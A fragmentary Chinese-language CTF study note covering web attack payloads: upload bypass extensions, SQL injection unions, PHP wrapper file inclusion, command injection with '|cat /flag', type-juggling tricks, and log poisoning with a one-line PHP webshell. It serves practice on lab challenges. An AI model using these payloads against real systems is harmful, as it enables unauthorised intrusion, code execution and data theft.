文件上传总结:https://www.anquanke.com/post/id/164561
文件上传可解析后缀asp/aspx
1
asp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr
php
1
php,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml
jsp
1
jsp,jspa,jspx,jsw,jsv,jspf,jtml,jSp,jSpx,jSpa,jSw,jSv,jSpf,jHtml
文件上传文件头绕过
先学学sql注入
web17111' or '1 #后面的数字会被解析为true
web172输入1试一下,返回username,password两列,联合注入前后表格列数必须相等
题目给了表名与列名,又因为username !='flag' 返回flag会报错
让其返回id与password两列
199999' union select id,password from ctfshow_user2 where username='flag
web173思路同上,要返回三列
select 1,2 1,2占位可以用1,’a’等替换
12341' union select 1,2,password from ctfshow_user3--+也可以使用replace(),hex()等处理返回的username1' union select id,hex(username),password from ctfshow_user3--+1' union select id,replace(use ...
[极客大挑战 2019]EasySQL万能密码 admin’ or 1=1# 密码随便
[极客大挑战 2019]Havefun查看源码?cat=dog
[ACTF2020 新生赛]Include直接伪协议
1?file=php://filter/convert.base64-encode/resource=flag.php
[HCTF 2018]WarmUp查看源码发现source.php,然后有发现hint.php,发现ffffllllaaaagggg
1?file=source.php?../../../../../ffffllllaaaagggg
[ACTF2020 新生赛]Exec1127.0.0.1|cat /flag
[GXYCTF2019]Ping Ping Ping通过尝试发现” ‘ ? * flag \ {等被禁
1?ip=127.0.0.1|cat$IFS`ls`;然后查看源码
[极客大挑战 2019]Secret File查看源码发现/Archive_room.php,点击按钮后快速跳转网页,进行抓包发现
secr3t.php ...
web891?num[]=1 #preg_match只能处理字符串,当传入的subject是数组时会返回false
web901?num=4476.0
web911?cmd=%0aphp ?cmd=php%0a%0d #m表示多行匹配,若存在换行\n并且有开始^或结束$符的情况下, 将以换行为分隔符,逐行进行匹配
web921?num=0x117c #16进制
相关知识:强比较“===”/弱比较“==“
web931?num=010574 #8进制
web941?num=4476.0 #strpos($num, "0")返回出现0的位置,所以这里0不能在首位
web951?num=+010574
web961?u=./flag.php
web971a[]=1&b[]=2
web98如果使用GET方式传参,GET传参会被赋值为POST传参的,又要求$_GET[‘HTTP_FLAG’]==’flag’,所以只要同时使用GET,POST传参HTTP ...
web78123?file=data://text/plain,<?php system('tac flag.php');?>或者?file=php://filter/convert.base64-encode/resource=flag.php
web7912?file=data://text/plain,<?phP system('tac flag.php');?>?file=data://text/plain,<?= system('tac flag.php');?>
php中代码开始标志类型(,,,<% %>,<%= %>)
web80+81利用日志文件,先通过user-agent写入一句话木马
12?file=/var/log/nginx/access.log POST:1=system("tac fl0g.php");






